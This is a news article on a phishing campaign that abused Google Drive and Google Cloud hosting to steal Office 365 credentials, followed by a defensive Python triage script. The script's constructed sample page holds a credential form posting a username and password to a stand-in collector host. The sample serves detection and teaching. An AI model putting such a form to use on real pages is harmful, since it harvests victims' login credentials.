Phishing campaign uses Google's cloud services to steal Office 365 credentials

The hackers host a specially designed PDF file on Google Drive. Google Cloud also hosts the phishing website used in the attack. Similar attacks also abuse cloud services from other providers such as Microsoft Azure.

A current phishing campaign hosts specially designed documents on Google's cloud services, which cybercriminals use in an attempt to tap login credentials for Office 365 accounts. In doing so, they are following the trend of storing fake documents and websites on public cloud servers instead of keeping them on their own or rented servers.

According to Bleeping Computer, Check Point researchers have now described an attack in which the hackers used Google Drive to spread a malicious PDF document. They also hosted their phishing website on Google's "storage.googleapis.com".

The PDF file was designed to look as if it provided access to content available on Microsoft's SharePoint platform. A victim who clicked on the "Access Document" link ended up on the phishing website hosted in the Google Cloud. It asked the user to enter their Office 365 credentials.

According to Check Point, the attack was difficult for users to identify because all of the resources used came from legitimate sources. A further development of the attack method also uses the Google service Cloud Functions, which allows code to be executed in the cloud. With it, the attackers could even disguise the origin of the content required for the phishing site.

In the variant without Cloud Functions, the researchers found a domain of the attackers in the code of the phishing site, which in turn is said to point to an IP address in Ukraine. This allowed them to link the campaign to the hackers' activities from 2018, when they were still hosting their phishing sites directly on a malicious domain. They then switched to Microsoft Azure before ending up on Google's cloud offerings.
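
The pattern described above, a credential form served from shared cloud hosting whose code still references other hosts, can be checked for when triaging a reported page. The following Python is an added example, not code from Check Point or from this article; the host suffix list, the function names and the sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: host suffixes for the shared Google services named in the article.
SHARED_HOSTING = ("storage.googleapis.com", "cloudfunctions.net")

def on_shared_hosting(host):
    return any(host == s or host.endswith("." + s) for s in SHARED_HOSTING)

class _Collector(HTMLParser):
    """Collects password fields and every URL the page posts to or loads from."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.password_field = False
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True
        for name in ("action", "src", "href"):
            # <a href> is navigation, not a resource the page itself pulls in.
            if a.get(name) and not (tag == "a" and name == "href"):
                self.urls.append(urljoin(self.base_url, a[name]))

def triage(page_url, html):
    page_host = urlparse(page_url).hostname or ""
    c = _Collector(page_url)
    c.feed(html)
    hosts = {urlparse(u).hostname for u in c.urls} - {page_host, None}
    return {
        "credential_form_on_shared_host": c.password_field and on_shared_hosting(page_host),
        # Hosts outside shared hosting are pivots for attribution (a domain in the page code).
        "pivot_hosts": sorted(h for h in hosts if not on_shared_hosting(h)),
        # Content relayed through shared hosting does not reveal its true origin.
        "opaque_hosts": sorted(h for h in hosts if on_shared_hosting(h)),
    }

# Constructed sample page, not taken from the campaign.
SAMPLE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """<html><body><img src="logo.png">
<script src="https://us-central1-example-project.cloudfunctions.net/assets"></script>
<form action="https://collector.example.invalid/submit" method="post">
<input type="email" name="user"><input type="password" name="pass">
</form></body></html>"""
```

Calling `triage(SAMPLE_URL, SAMPLE_HTML)` flags the credential form and separates the one host an analyst can pivot on from the one that hides behind shared hosting.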

Google has since removed the content in question from its server. “Google investigates phishing sites and locks them out when we see them through Safe Browsing data feeds and other direct reports,” the company said.
